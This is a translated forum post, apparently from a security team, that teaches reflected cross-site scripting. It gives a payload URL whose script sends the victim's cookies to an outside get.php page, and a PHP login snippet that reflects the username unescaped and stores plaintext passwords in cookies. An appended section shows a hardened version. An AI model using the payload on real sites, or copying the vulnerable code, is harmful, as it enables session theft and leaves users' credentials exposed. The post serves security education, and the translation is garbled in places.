My forum will be open soon, so I'm a little excited! Let's take a look at the following!
Background: exploring and using XSS is conducive to the learning atmosphere!
XSS: Cross Site Scripting
General attack steps:
1. We generally send the target an HTTP link that hides the cross-site script: http://www.bkjia.com/post.php?user=<script>document.location="http://www.bkjia.com/get.php?cookie="+document.cookie;</script>
2. The target user opens the website with the XSS vulnerability. During login, the HTTP link we sent, which hides the cross-site script, is opened.
3. The 90se with XSS processes the HTTP link and displays the value of the URL parameter user, so the cross-site script is executed.
4. The XSS redirects the target user's browser to our page, http://www.bkjia.com/get.php, and the cookie data of the target user's browser is passed as the URL parameter cookie of the get.php page: http://www.bkjia.com/get.php?cookie=document.cookie, so that we can get the target's cookie.
Simple Mining: See the following code:
if ($match_count)
{
    setcookie("username", $_POST["username"], time() + 30*24*60*60); // Save the value of the username field to the cookie
    setcookie("password", $_POST["password"], time() + 30*24*60*60); // Save the value of the password field to the cookie
    mysql_free_result($result);
    mysql_close($link);
    // Jump to the page
    // After the user logs on, the current page is redirected to black.php. The black.php file has the URL parameter user, and the user value is the account of the visitor.
    header("Location: http://localhost/balck/black.php?user=" . $_POST["username"]);
}
else
{
    header("Location: http://" . $_SERVER["HTTP_HOST"] . $_SERVER["SCRIPT_NAME"]);
}
From: 90 sacret Team Information Security Team
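
A hardened counterpart of the login redirect above, as an added example that is not part of the original post. The function names are hypothetical, and it assumes black.php writes the user parameter straight into its HTML, as step 3 describes.

```php
<?php
// Added example: hardened counterpart of the login redirect above.
// Function names are hypothetical; how black.php prints "user" is assumed.

// Percent-encode the account name before it goes into the Location header,
// so "<", ">", quotes and CR/LF never reach the URL as raw characters.
function build_login_redirect(string $username): string
{
    return "http://localhost/balck/black.php?user=" . rawurlencode($username);
}

// What black.php should do with $_GET["user"] before writing it into HTML:
// encode for the HTML context so the value is shown as text, not parsed.
function render_user(string $user): string
{
    return "<p>Welcome, "
        . htmlspecialchars($user, ENT_QUOTES | ENT_SUBSTITUTE, "UTF-8")
        . "</p>";
}

// Options for setcookie(): HttpOnly keeps the cookie out of document.cookie,
// which is the value the script in step 1 reads.
function login_cookie_options(): array
{
    return [
        "expires"  => time() + 30 * 24 * 60 * 60,
        "path"     => "/",
        "secure"   => true,   // assumes the site is served over HTTPS
        "httponly" => true,
        "samesite" => "Lax",
    ];
}

// In the login handler (web context) this replaces the calls above:
//   setcookie("username", $_POST["username"], login_cookie_options());
//   header("Location: " . build_login_redirect($_POST["username"]));
// The password is not written to a cookie at all.

// Constructed sample input: the script from step 1 as the "user" value.
$sample = '<script>document.location="http://www.bkjia.com/get.php?cookie="'
        . '+document.cookie;</script>';
echo build_login_redirect($sample), "\n";
echo render_user($sample), "\n";
```

Run from the command line, the two printed lines show the sample value percent-encoded in the redirect URL and entity-encoded in the page output, so the browser displays it as text.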